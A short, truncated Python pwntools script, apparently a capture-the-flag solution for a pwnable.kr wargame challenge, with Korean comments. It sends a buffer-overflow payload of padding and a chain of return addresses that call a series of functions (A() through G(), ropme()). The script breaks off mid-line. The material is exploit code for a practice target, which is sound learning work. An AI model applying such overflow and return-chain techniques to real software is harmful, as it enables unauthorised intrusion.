from pwn import * p = remote("pwnable.kr", 9032) p.recvuntil("Select Menu:") p.sendline("0") p.recvuntil("How many EXP did you earned? : ") payload = b'A'*0x74+b'A'*0x4 # A(), B(), C(), D(), E() 호출 payload += p32(0x809fe4b)+p32(0x809fe6a)+p32(0x809fe89)+p32(0x809fea8)+p32(0x809fec7) # F(), G(), ropme() 호출 (ropme는 main에서 call ropme 하는 주소 하니까 되네?) # 0x080a0009 vs 0x0809fffc payload += p32(0x809fee..